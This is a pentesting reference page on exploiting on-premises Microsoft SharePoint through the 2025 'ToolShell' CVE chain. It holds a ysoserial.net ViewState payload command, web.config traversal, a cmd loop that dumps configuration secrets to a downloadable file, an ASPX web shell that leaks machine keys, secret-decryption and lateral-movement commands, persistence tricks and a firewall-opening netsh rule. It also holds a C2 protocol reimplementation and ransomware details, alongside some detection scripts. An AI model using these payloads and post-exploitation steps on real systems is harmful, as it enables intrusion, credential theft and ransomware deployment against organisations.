Microsoft SharePoint – Pentesting & Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft SharePoint (on-premises) is built on ASP.NET/IIS. Most of the classic web attack surface (ViewState, web.config, web shells, etc.) therefore applies, but SharePoint also ships hundreds of proprietary ASPX pages and web services that greatly widen the exposed attack surface. This page collects practical techniques for enumerating, exploiting and persisting inside SharePoint environments, with emphasis on the 2025 exploit chain documented by Unit42 (CVE-2025-49704/49706/53770/53771).

1. Quick enumeration

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (a.k.a. “ToolShell”)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> allows arbitrary Server-Side Include code to be injected into a page that ASP.NET later compiles. An attacker can embed C# that calls Process.Start() and drop a malicious ViewState.

2.2 CVE-2025-49706 – Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine the site context. By pointing it at /_layouts/15/, the MFA/SSO enforced on the root site can be bypassed without authenticating.

2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE

Once the attacker controls a gadget inside ToolPane.aspx, they can send an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe and ends in code execution.

If signing is enabled, steal the ValidationKey/DecryptionKey from any web.config (see 2.4) and build the payload with ysoserial.net or ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read:

Exploiting __VIEWSTATE without knowing the secrets
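Added example (not from this page or the ViewState write-up it links to): a Python triage of a __VIEWSTATE value that checks for the ObjectStateFormatter header, locates a Token_BinarySerialized payload by its BinaryFormatter preamble and reports gadget type names left behind by the ysoserial.net chains named above. The gadget-name list and both sample blobs are constructed here, and the routine is a heuristic rather than a full ObjectStateFormatter decoder.

```python
import base64
from typing import Dict, List, Tuple

# ObjectStateFormatter constants (.NET reference source, System.Web.UI)
LOS_MAGIC = b"\xff\x01"            # Marker_Format, Marker_Version_1
TOKEN_PAIR = 0x0F
TOKEN_STRING = 0x05
TOKEN_NULL = 0x64
TOKEN_BINARY_SERIALIZED = 0x32     # the formatter hands these bytes to BinaryFormatter
# SerializationHeaderRecord that opens every BinaryFormatter stream
BF_PREAMBLE = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00"
# Type names the ysoserial.net chains named on this page leave in the stream (assumed list)
GADGET_HINTS = [
    b"System.Diagnostics.Process",
    b"System.Windows.Data.ObjectDataProvider",
    b"System.DelegateSerializationHolder",     # TypeConfuseDelegate
    b"System.Collections.Generic.SortedSet",   # TypeConfuseDelegate carrier
    b"Newtonsoft.Json",                        # Json.Net bridge formatter
]


def encode_7bit(n: int) -> bytes:
    """.NET BinaryWriter.Write7BitEncodedInt."""
    out = bytearray()
    while True:
        b = n & 0x7F
        n >>= 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def read_7bit(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode a 7-bit length prefix at pos; returns (value, position after it)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def inspect_viewstate(b64: str) -> Dict[str, object]:
    """Heuristic triage of a __VIEWSTATE value; not a full ObjectStateFormatter parser."""
    raw = base64.b64decode(b64)
    findings: List[str] = []
    if not raw.startswith(LOS_MAGIC):
        # Encrypted ViewState (viewStateEncryptionMode=Always) looks like this;
        # the decryptionKey is needed before any inspection is possible.
        findings.append("no FF 01 header: encrypted or not ObjectStateFormatter output")
        return {"findings": findings, "suspicious": False}
    idx = raw.find(BF_PREAMBLE)
    if idx >= 0:
        findings.append(f"BinaryFormatter stream at offset {idx}")
        # walk back over a 1..5 byte length prefix to confirm Token_BinarySerialized
        for back in range(1, 6):
            start = idx - back - 1
            if start >= len(LOS_MAGIC) and raw[start] == TOKEN_BINARY_SERIALIZED:
                length, data_start = read_7bit(raw, start + 1)
                if data_start == idx:
                    findings.append(f"Token_BinarySerialized declares {length} bytes")
                    break
        for hint in GADGET_HINTS:
            if hint in raw[idx:]:
                findings.append("gadget type name: " + hint.decode())
    suspicious = any(f.startswith("gadget type name") for f in findings)
    return {"findings": findings, "suspicious": suspicious}


# Constructed samples (built here, not captured from a real farm).
# Benign: Pair(String("abc"), Null), the shape of an ordinary page's state.
BENIGN_VIEWSTATE = base64.b64encode(
    LOS_MAGIC + bytes([TOKEN_PAIR, TOKEN_STRING]) + encode_7bit(3) + b"abc" + bytes([TOKEN_NULL])
).decode()
# Hostile: Pair(BinarySerialized(<stream naming System.Diagnostics.Process>), Null).
SAMPLE_BF_STREAM = (BF_PREAMBLE + b"\x0c\x02\x00\x00\x00"                      # BinaryLibrary record
                    + encode_7bit(26) + b"System.Diagnostics.Process" + b"\x0b")  # MessageEnd
HOSTILE_VIEWSTATE = base64.b64encode(
    LOS_MAGIC + bytes([TOKEN_PAIR, TOKEN_BINARY_SERIALIZED]) + encode_7bit(len(SAMPLE_BF_STREAM))
    + SAMPLE_BF_STREAM + bytes([TOKEN_NULL])
).decode()

if __name__ == "__main__":
    for name, vs in (("benign", BENIGN_VIEWSTATE), ("hostile", HOSTILE_VIEWSTATE)):
        print(name, inspect_viewstate(vs))
```

Run it on the __VIEWSTATE captured in a request to ToolPane.aspx: a Token_BinarySerialized payload carrying Process or ObjectDataProvider type names is the tell, since ASP.NET only falls back to BinaryFormatter for types it has no dedicated token for. A value without the FF 01 header is encrypted, so the decryptionKey from 2.4 is needed first; the trailing MAC bytes of a signed value do not disturb the search.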

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Sending a crafted Source parameter to ToolPane.aspx (for example ../../../../web.config) returns the targeted file, allowing leakage of:

  • <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

2.5 ToolShell workflow observed in Ink Dragon intrusions

Check Point documented how Ink Dragon had the ToolShell chain working months before Microsoft shipped fixes:

  • Header spoofing for auth bypass – the attacker sends POSTs to /_layouts/15/ToolPane.aspx with Referer: https://<victim>/_layouts/15/ plus a forged X-Forms_BaseUrl. Those headers convince SharePoint that the request originates from a trusted layout page and skip front-door authentication entirely (CVE-2025-49706/CVE-2025-53771).
  • Serialized gadget in the same request – the body carries attacker-controlled ViewState/ToolPart data that reaches the broken server-side formatter (CVE-2025-49704/CVE-2025-53770). The payload is typically a ysoserial.net chain that runs inside w3wp.exe without touching disk.
  • Internet-scale scanning – July 2025 telemetry shows them enumerating every reachable /_layouts/15/ToolPane.aspx endpoint and replaying a dictionary of leaked <machineKey> pairs. Any site that copied a sample validationKey from documentation can be taken over even when fully patched (see the ViewState page for the signing workflow).
  • Immediate staging – successful exploitation drops a loader or PowerShell stager that: (1) dumps every web.config, (2) plants an ASPX webshell for fallback access, and (3) schedules a local Potato privesc to escape the IIS worker.
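Added example (not part of Check Point's report or this page's original material): a Python hunt over IIS W3C logs for the request shape in the first two bullets, anonymous POSTs to ToolPane.aspx whose Referer is the bare /_layouts/ directory. The log lines are constructed, and the three-indicator threshold is an assumption to tune per farm.

```python
import re
from typing import Dict, Iterator, List

# Constructed IIS W3C log sample (not from any real intrusion): a normal page
# hit, an anonymous POST matching the ToolShell pattern, and an authenticated
# editor legitimately using the web-part tool pane.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-07-19 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 01:02:03 10.0.0.5 GET /sites/hr/Pages/default.aspx - 443 CONTOSO\alice 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) https://sp.contoso.local/sites/hr 200 0 0 120
2025-07-19 01:05:44 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 198.51.100.7 python-requests/2.32.0 https://sp.contoso.local/_layouts/15/ 200 0 0 954
2025-07-19 01:06:10 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\bob 10.0.0.31 Mozilla/5.0+(Windows+NT+10.0) https://sp.contoso.local/sites/hr/Pages/default.aspx 200 0 0 310
"""

TOOLPANE = re.compile(r"/_layouts/1[56]/toolpane\.aspx$", re.I)
# Referer that is the bare layouts directory rather than a real page, as described above
LAYOUTS_ROOT_REFERER = re.compile(r"^https?://[^/]+/_layouts/1[56]/?$", re.I)


def parse_iis_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue
        values = line.split(" ")   # IIS encodes spaces inside values as '+'
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def toolshell_indicators(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry looks like the ToolPane.aspx abuse pattern."""
    reasons: List[str] = []
    if entry.get("cs-method") != "POST" or not TOOLPANE.search(entry.get("cs-uri-stem", "")):
        return reasons
    reasons.append("POST to ToolPane.aspx")
    if entry.get("cs-username", "-") == "-":
        reasons.append("no authenticated user (cs-username is '-')")
    if LAYOUTS_ROOT_REFERER.match(entry.get("cs(Referer)", "")):
        reasons.append("Referer is the bare /_layouts/ directory")
    if entry.get("sc-status") == "200":
        reasons.append("server answered 200")
    return reasons


def hunt(text: str, min_reasons: int = 3) -> List[Dict[str, object]]:
    """Keep entries that stack at least min_reasons indicators (threshold is an assumption)."""
    hits: List[Dict[str, object]] = []
    for entry in parse_iis_w3c(text):
        reasons = toolshell_indicators(entry)
        if len(reasons) >= min_reasons:
            hits.append({"when": entry["date"] + " " + entry["time"],
                         "client": entry["c-ip"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["when"], hit["client"], "; ".join(hit["reasons"]))
```

Authenticated editors also POST to ToolPane.aspx when they edit web parts, so method and path alone are noise; the missing cs-username and the directory-only Referer are what separate the two POSTs in the sample. On farms using claims or forms authentication IIS can log - for cs-username even for authenticated users, so validate the threshold against a baseline before alerting on it.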

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.
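Added example (my code, not something observed in the intrusions): a Python parser for the concatenated dump that the loop above produces, which also covers the 2.4 web.config disclosure since each leaked file has the same shape. It splits on the XML declarations, pulls <machineKey>, connection strings and impersonation credentials, and lists sections that are RSA-protected and therefore need aspnet_regiis on the box rather than this script. The embedded dump is constructed with placeholder values.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed dump in the shape the `for /R ... type` loop above produces:
# whole web.config files appended back to back. Every value is a placeholder.
SAMPLE_DUMP = r"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <connectionStrings>
    <add name="SPContent" connectionString="Data Source=SQL01;Initial Catalog=WSS_Content;User ID=spsql;Password=PLACEHOLDER1" providerName="System.Data.SqlClient" />
  </connectionStrings>
  <system.web>
    <machineKey validationKey="PLACEHOLDERVALIDATIONKEY" decryptionKey="PLACEHOLDERDECRYPTIONKEY" validation="HMACSHA256" decryption="AES" />
    <identity impersonate="true" userName="CONTOSO\svc_sp" password="PLACEHOLDER2" />
  </system.web>
</configuration>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData Type="http://www.w3.org/2001/04/xmlenc#Element" xmlns="http://www.w3.org/2001/04/xmlenc#">
      <CipherData><CipherValue>PLACEHOLDERCIPHERTEXT</CipherValue></CipherData>
    </EncryptedData>
  </connectionStrings>
</configuration>
"""

XML_DECL = re.compile(r"(?=<\?xml\b)")


def split_configs(dump: str) -> List[str]:
    """Cut a concatenated dump back into individual XML documents."""
    docs: List[str] = []
    for part in XML_DECL.split(dump):
        part = part.strip("\ufeff \t\r\n")   # `type` copies each file's BOM too
        if part.startswith("<?xml"):
            docs.append(part)
    return docs


def harvest(dump: str) -> List[Dict[str, object]]:
    """Pull machineKey, connection strings, impersonation creds and protected sections."""
    results: List[Dict[str, object]] = []
    for i, doc in enumerate(split_configs(dump)):
        root = ET.fromstring(doc)
        entry: Dict[str, object] = {"index": i, "machine_key": None, "connection_strings": [],
                                    "impersonation": None, "protected_sections": []}
        mk = root.find("system.web/machineKey")
        if mk is not None:
            entry["machine_key"] = dict(mk.attrib)
        for add in root.findall("connectionStrings/add"):
            entry["connection_strings"].append({"name": add.get("name"), "value": add.get("connectionString")})
        ident = root.find("system.web/identity")
        if ident is not None and ident.get("impersonate", "").lower() == "true" and ident.get("userName"):
            entry["impersonation"] = {"user": ident.get("userName"), "password": ident.get("password")}
        # Any section carrying configProtectionProvider is encrypted at rest and
        # needs aspnet_regiis -pdf on the box (or the exported RSA container) to read.
        for el in root.iter():
            if "configProtectionProvider" in el.attrib:
                entry["protected_sections"].append((el.tag, el.attrib["configProtectionProvider"]))
        results.append(entry)
    return results


if __name__ == "__main__":
    for entry in harvest(SAMPLE_DUMP):
        print(entry)
```

Feed it the downloaded debug_dev.js (or a single web.config from 2.4). A machine_key with explicit validationKey/decryptionKey is what the ViewState forging in 2.3 needs; a protected_sections entry means the secrets are still RSA-wrapped and only the web server's key container can open them.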

3.2 Drop a Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Decoded payload example (abbreviated):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
    // read the effective <machineKey> of this web application and echo it
    MachineKeySection mk = (MachineKeySection)WebConfigurationManager.GetSection("system.web/machineKey");
    Response.Write(mk.ValidationKey + "|" + mk.DecryptionKey + "|" + mk.CompatibilityMode);
    // echo secrets or invoke cmd
}
</script>

Written to:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate the machine keys, which allows forging ViewState and ASPXAUTH cookies across the whole farm.

3.3 Obfuscated variant (variation-3)

Same shell, but:

  • placed under ...\15\TEMPLATE\LAYOUTS\
  • parameter names shortened to a single letter
  • Thread.Sleep(<ms>) added for sandbox evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)

Recent incident-response investigations (Unit42 “Project AK47”) show how intruders follow the ToolShell chain's initial RCE by deploying a dual-channel C2 implant and ransomware inside SharePoint environments:

AK47C2 – dnsclient variant

  • Hard-coded DNS server 10.7.66.10, talking to the authoritative domain update.updatemicfosoft.com.
  • Messages are JSON objects XOR-encrypted with the static key VHBD@H, hex-encoded and embedded as sub-domain labels:
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
  • Long queries are split into fragments carrying an s prefix and reassembled server-side.
  • The server returns responses in TXT records using the same XOR/hex scheme:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
  • Version 202504 introduced a simplified <COMMAND>::<SESSION_KEY> format and the fragment markers 1, 2, a.

AK47C2 – httpclient variant

  • Reuses the same JSON & XOR routines but sends the hex blob inside an HTTP POST body via libcurl (CURLOPT_POSTFIELDS, etc.).
  • Same task/result flow, supporting:
  • execution of arbitrary shell commands
  • adjustable sleep interval and kill-switch commands.
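Added example, not the implant's code: a Python reimplementation of the AK47C2 message encoding described above (JSON, repeating-key XOR with VHBD@H, hex) covering both the dnsclient fragmentation into s-prefixed labels and the httpclient POST body, plus a matching hunting rule for DNS logs. The key and domain are the ones reported above; the fragment ordering, the label size and the sample messages are assumptions made here.

```python
import json
import re
from typing import Dict, List

XOR_KEY = b"VHBD@H"                        # static key reported for AK47C2
C2_DOMAIN = "update.updatemicfosoft.com"   # authoritative domain reported for the dnsclient
MAX_LABEL = 63                             # DNS label limit (RFC 1035)
FRAG_PREFIX = "s"                          # fragment marker described above


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_message(msg: Dict[str, str]) -> str:
    """JSON -> XOR -> lowercase hex, the wire form shared by both variants."""
    return xor_bytes(json.dumps(msg, separators=(",", ":")).encode()).hex()


def decode_message(hexblob: str) -> Dict[str, str]:
    """Inverse of encode_message; also decodes the TXT answers the server returns."""
    return json.loads(xor_bytes(bytes.fromhex(hexblob)).decode())


def to_dns_queries(msg: Dict[str, str], domain: str = C2_DOMAIN) -> List[str]:
    """dnsclient side: fragment the hex blob into 's'-prefixed labels, one query each.
    Assumption: fragments are reassembled in send order; the ordering markers of the
    202504 build are not described in enough detail here to reproduce."""
    blob = encode_message(msg)
    step = MAX_LABEL - len(FRAG_PREFIX)
    return [f"{FRAG_PREFIX}{blob[i:i + step]}.{domain}" for i in range(0, len(blob), step)]


def reassemble(queries: List[str], domain: str = C2_DOMAIN) -> Dict[str, str]:
    """Server side: strip the domain and prefix, concatenate, decode."""
    blob = ""
    for q in queries:
        label = q[: -(len(domain) + 1)] if q.endswith("." + domain) else q
        if not label.startswith(FRAG_PREFIX):
            raise ValueError(f"unexpected label {label!r}")
        blob += label[len(FRAG_PREFIX):]
    return decode_message(blob)


def to_http_body(msg: Dict[str, str]) -> bytes:
    """httpclient side: the same hex blob, posted raw (CURLOPT_POSTFIELDS)."""
    return encode_message(msg).encode()


HEX_LABEL = re.compile(r"^s[0-9a-f]{16,62}$")


def looks_like_ak47_query(qname: str, domain: str = C2_DOMAIN) -> bool:
    """Hunting rule for DNS logs: long hex-only label with the 's' marker under the C2 domain."""
    return qname.endswith("." + domain) and bool(HEX_LABEL.match(qname.split(".")[0]))


# Constructed traffic, not captured from a real incident
TASK = {"cmd": "whoami", "cmd_id": "42"}
RESULT = {"cmd": "whoami", "cmd_id": "42", "type": "result", "fqdn": "SP01",
          "result": "iis apppool\\sharepoint"}

if __name__ == "__main__":
    queries = to_dns_queries(TASK)
    for q in queries:
        print(q)
    print(reassemble(queries))
    print(to_http_body(TASK))
    print(decode_message(encode_message(RESULT)))
```

The decoder is the useful half for responders: pull the first label of each query to the domain from DNS logs or a pcap, drop the s, concatenate and run decode_message to recover the tasking; the TXT answer bodies decode the same way. The hunting rule keys on the domain, so for a generic sweep drop that check and look for hosts issuing many long hex-only labels.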

X2ANYLOCK ransomware

  • 64-bit C++ payload launched via DLL side-loading (see below).
  • Uses AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the .x2anylock extension.
  • Encrypts recursively across local drives and discovered SMB shares; skips system paths.
  • Drops a clear-text note How to decrypt my data.txt containing a static Tox ID for negotiation.
  • Has a built-in kill-switch:
if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

  1. The intruder writes dllhijacked.dll/My7zdllhijacked.dll next to 7z.exe.
  2. The SharePoint-spawned w3wp.exe launches 7z.exe, which picks up the malicious DLL through the Windows DLL search order and calls the ransomware entry point in memory.
  3. A separate LockBit loader was observed (bbb.msi ➜ clink_x86.exe ➜ clink_dll_x86.dll) that decrypts shellcode and performs DLL hollowing inside d3dl1.dll to run LockBit 3.0.

[!INFO] The same static Tox ID found in X2ANYLOCK also appears in leaked LockBit databases, pointing to affiliate overlap.

3.5 Turning SharePoint assets into lateral movement

  • Decrypt every protected section – once you have a foothold on the web tier, run aspnet_regiis.exe -pdf "connectionStrings" <physical path of the web application> (or -pdf "appSettings") on that box to recover the clear-text secrets hidden behind <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">; the RSA container itself can be exported for offline use with aspnet_regiis.exe -px "NetFrameworkConfigurationKey" C:\temp\key.xml -pri. Ink Dragon routinely harvested SQL logins, SMTP relays and custom service certificates this way.
  • Recycle app-pool accounts across farms – many organisations reuse the same domain account for IIS APPPOOL\SharePoint on every front-end. After unwrapping identity impersonate="..." blocks or reading ApplicationHost.config, try the credential over SMB/RDP/WinRM against every neighbouring server. In many incidents that account was also a local administrator, allowing psexec, sc create or scheduled-task staging without resorting to password sprays.
  • Abuse leaked <machineKey> values internally – even once the internet perimeter is patched, reuse of the same validationKey/decryptionKey allows lateral ViewState exploitation between internal SharePoint zones that trust each other.

3.6 Persistence patterns observed in 2025 intrusions

  • Scheduled tasks – a one-shot task named SYSCHECK (or another health-themed name) is created with /ru SYSTEM /sc once /st <hh:mm> to launch the next-stage loader (usually a renamed conhost.exe). Because it runs only once, telemetry often misses it unless historical task XML is retained.
  • Masqueraded services – services such as WindowsTempUpdate, WaaSMaintainer or MicrosoftTelemetryHost are installed via sc create pointing at the side-loading triad directory. The binaries keep their original AMD/Realtek/NVIDIA signatures but are renamed to resemble Windows components; comparing the on-disk name with the PE OriginalFileName field is a quick integrity check.
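Added example (not from the intrusion reporting): a Python triage of scheduled-task XML files as written under C:\Windows\System32\Tasks, scoring the combination in the first bullet, a SYSTEM principal, a one-shot TimeTrigger and a Windows-looking binary launched from outside the system directories. The two task definitions are constructed; the trusted-directory list, the masqueraded-name list and the three-indicator threshold are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SYSTEM_IDS = {"s-1-5-18", "system", r"nt authority\system"}
# directories a SYSTEM task is normally expected to launch from (assumed list)
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
# binaries whose names loaders reuse outside their real home (assumed list)
WINDOWS_NAMES = {"conhost.exe", "svchost.exe", "dllhost.exe", "rundll32.exe"}

# Constructed task definitions mimicking what `schtasks /create /ru SYSTEM /sc once`
# writes to C:\Windows\System32\Tasks; the file on disk is UTF-16 with a BOM.
SUSPECT_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\SYSCHECK</URI></RegistrationInfo>
  <Triggers><TimeTrigger><StartBoundary>2025-07-20T03:15:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\ProgramData\\Intel\\conhost.exe</Command></Exec></Actions>
</Task>""".encode("utf-16")

BENIGN_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T01:00:00</StartBoundary><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command></Exec></Actions>
</Task>""".encode("utf-16")


def load_task(data: bytes) -> ET.Element:
    """Decode the UTF-16 file and drop the declaration so ET's str parser accepts it."""
    text = data.decode("utf-16") if data[:2] in (b"\xff\xfe", b"\xfe\xff") else data.decode("utf-8-sig")
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", text))


def _text(root: ET.Element, path: str) -> str:
    el = root.find(path)
    return (el.text or "").strip() if el is not None else ""


def triage_task(data: bytes) -> Dict[str, object]:
    """Score one task definition against the SYSCHECK-style persistence pattern."""
    root = load_task(data)
    reasons: List[str] = []
    name = _text(root, f"{NS}RegistrationInfo/{NS}URI")
    user = _text(root, f"{NS}Principals/{NS}Principal/{NS}UserId").lower()
    if user in SYSTEM_IDS:
        reasons.append("runs as SYSTEM")
    tt = root.find(f"{NS}Triggers/{NS}TimeTrigger")
    if tt is not None and tt.find(f"{NS}Repetition") is None:
        reasons.append("one-shot TimeTrigger (/sc once)")
    cmd = _text(root, f"{NS}Actions/{NS}Exec/{NS}Command").strip('"')
    cmd_l = re.sub(r"%(windir|systemroot)%", r"c:\\windows", cmd.lower())
    if cmd_l and not cmd_l.startswith(TRUSTED_DIRS):
        reasons.append(f"launches from untrusted path {cmd}")
        if cmd_l.rsplit("\\", 1)[-1] in WINDOWS_NAMES:
            reasons.append("Windows binary name outside its system directory")
    return {"name": name, "command": cmd, "reasons": reasons, "suspicious": len(reasons) >= 3}


if __name__ == "__main__":
    for data in (SUSPECT_TASK, BENIGN_TASK):
        print(triage_task(data))
```

Read every file under the Tasks directory as bytes (they are UTF-16 with a BOM) and keep the ones that score; the task XML on disk is the historical record the bullet above refers to, so collect it before cleanup removes the task.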

3.7 Loosening the host firewall for relay traffic

Ink Dragon repeatedly adds an outbound allow rule disguised as Defender maintenance so that ShadowPad/FinalDraft traffic can leave on any port:

netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

Because the rule is created locally (not through GPO) and its program= points at a Defender-looking path, most SOC baselines ignore it, yet it opens Any ➜ Any egress for that binary.


Related tricks

  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services
